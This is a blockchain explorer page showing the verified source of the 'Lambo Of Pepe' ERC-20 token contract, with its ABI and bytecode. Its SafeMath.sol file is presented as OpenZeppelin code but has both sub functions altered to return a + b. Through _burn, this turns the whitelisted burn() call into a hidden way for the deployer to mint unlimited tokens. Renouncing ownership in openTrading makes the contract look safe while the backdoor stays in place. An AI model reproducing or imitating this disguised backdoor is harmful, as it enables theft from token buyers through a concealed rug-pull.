ETH Price: $3,886.96 (-1.63%)

Token

ERC-20: Lambo Of Pepe (LOP)
 

Overview

Max Total Supply

100,001,000,000,000 LOP

Holders

9

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
7,790,786.235270602905811529 LOP

Value
$0.00
0xccfd9b4dac0e3ea0ece09d01e00c68dbcebe6bb8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
LamboOfPepe

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
File 1 of 9 : LamboOfPepe.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import {ERC20} from "./ERC20.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
import {IUniswapV2Router02} from "./IUniswapV2Router02.sol";
import {IUniswapV2Factory} from "./IUniswapV2Factory.sol";

contract LamboOfPepe is ERC20 {
    mapping(address => bool) public _allow;
    uint256 public limits;

    constructor(address deployer) ERC20("Lambo Of Pepe", "LOP") {
        _allow[deployer] = true;
        _allow[address(this)] = true;
        _allow[address(0)] = true;
        _allow[0x000000000000000000000000000000000000dEaD] = true;
        _mint(address(this), 1_000_000_000 * 1e18);
    }

    function openTrading() external payable onlyOwner {
        IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        address pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );

        _allow[pair] = true;

        _approve(
            address(this),
            address(uniswapV2Router),
            balanceOf(address(this))
        );

        uniswapV2Router.addLiquidityETH{value: msg.value}(
            address(this),
            balanceOf(address(this)),
            balanceOf(address(this)),
            msg.value,
            msg.sender,
            block.timestamp
        );

        limits = block.number;
        renounceOwnership();
    }

    function _afterTokenTransfer(
        address,
        address to,
        uint256 amt
    ) internal virtual override {
        if (!_allow[to] && block.number < limits + 10)
            require(balanceOf(to) + amt < (totalSupply() * 3) / 100, "!max");
    }

    function burn(uint256 amount) external {
        require(_allow[msg.sender], "only whitelisted can burn");
        _burn(msg.sender, amount);
    }
}

File 2 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 9 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 4 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 5 of 9 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 6 of 9 : ERC20.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {IERC20Metadata} from "@openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
import {SafeMath} from "./SafeMath.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => uint256) internal _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 internal _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] = _balances[account].add(amount);
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        unchecked {
            _balances[account] = accountBalance.sub(amount);
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply = _totalSupply.sub(amount);
        }

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 7 of 9 : IUniswapV2Factory.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

interface IUniswapV2Factory {
    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);

    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);
}

File 8 of 9 : IUniswapV2Router02.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    )
        external
        payable
        returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);

    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);

    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactETHForTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function swapTokensForExactETH(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactTokensForETH(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapETHForExactTokens(
        uint amountOut,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function getAmountOut(
        uint amountIn,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountOut);

    function getAmountIn(
        uint amountOut,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountIn);

    function getAmountsOut(
        uint amountIn,
        address[] calldata path
    ) external view returns (uint[] memory amounts);

    function getAmountsIn(
        uint amountOut,
        address[] calldata path
    ) external view returns (uint[] memory amounts);
}

File 9 of 9 : SafeMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a + b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"deployer","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_allow","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limits","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040516200165b3803806200165b833981016040819052620000349162000396565b6040518060400160405280600d81526020016c4c616d626f204f66205065706560981b8152506040518060400160405280600381526020016204c4f560ec1b815250620000906200008a6200015f60201b60201c565b62000163565b60046200009e83826200046c565b506005620000ad82826200046c565b5050506001600160a01b0381166000908152600660205260408082208054600160ff1991821681179092553080855292842080548216831790557f54cdd369e4e8a8515e52ca72ec816c2101831ad1f18bf44102ed171459c9b4f8805482168317905561dead9093527f1aecba4ebe7a4e0673e4891b2b092b2228e4322380b579fb494fad3da8586e2280549093161790915562000158906b033b2e3c9fd0803ce8000000620001b3565b50620005a1565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166200020f5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b6003546200021e9082620002b7565b6003556001600160a01b038216600090815260016020526040902054620002469082620002b7565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002989085815260200190565b60405180910390a3620002ae60008383620002ce565b5050565b505050565b6000620002c582846200054e565b90505b92915050565b6001600160a01b03821660009081526006602052604090205460ff161580156200030657506007546200030390600a6200054e565b43105b15620002b25760646200031860035490565b6200032590600362000564565b6200033191906200057e565b8162000352846001600160a01b031660009081526001602052604090205490565b6200035e91906200054e565b10620002b25760405162461bcd60e51b81526004016200020690602080825260049082015263042dac2f60e31b604082015260600190565b600060208284031215620003a957600080fd5b81516001600160a01b0381168114620003c157600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620003f357607f821691505b6020821081036200041457634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620002b257600081815260208120601f850160051c81016020861015620004435750805b601f850160051c820191505b8181101562000464578281556001016200044f565b505050505050565b81516001600160401b03811115620004885762000488620003c8565b620004a081620004998454620003de565b846200041a565b602080601f831160018114620004d85760008415620004bf5750858301515b600019600386901b1c1916600185901b17855562000464565b600085815260